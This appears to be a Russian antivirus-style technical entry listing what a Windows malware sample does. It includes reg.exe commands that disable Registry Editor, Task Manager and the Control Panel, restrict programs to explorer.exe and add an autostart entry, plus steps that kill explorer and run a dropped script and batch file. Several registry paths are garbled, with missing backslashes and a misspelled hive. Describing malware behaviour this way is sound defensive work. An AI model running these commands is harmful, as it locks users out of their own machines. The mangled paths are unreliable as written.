Техническая информация
- <SYSTEM32>\reg.exe add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableRegistryTools /t REG_DWORD /d 1 /f
- <SYSTEM32>\reg.exe add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoControlPanel /t REG_DWORD /d 1 /f
- <SYSTEM32>\wscript.exe "%HOMEPATH%\Local Settings\Tempmes.js"
- <SYSTEM32>\reg.exe add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerRestrictRun /v 1 /t REG_DWORD /d %WINDIR%explorer.exe /f
- <SYSTEM32>\taskkill.exe /f /im explorer.exe
- <SYSTEM32>\cmd.exe /c ""%TEMP%\1.tmp\соснул.bat""
- <SYSTEM32>\reg.exe add HKLEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
- <SYSTEM32>\reg.exe add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f Ц
- %TEMP%\1.tmp\Autoexec.bat
- %HOMEPATH%\Local Settings\Tempmes.js
- %TEMP%\1.tmp\соснул.bat
- %TEMP%\1.tmp\соснул.bat
- ClassName: 'Shell_TrayWnd' WindowName: ''
- ClassName: '' WindowName: ''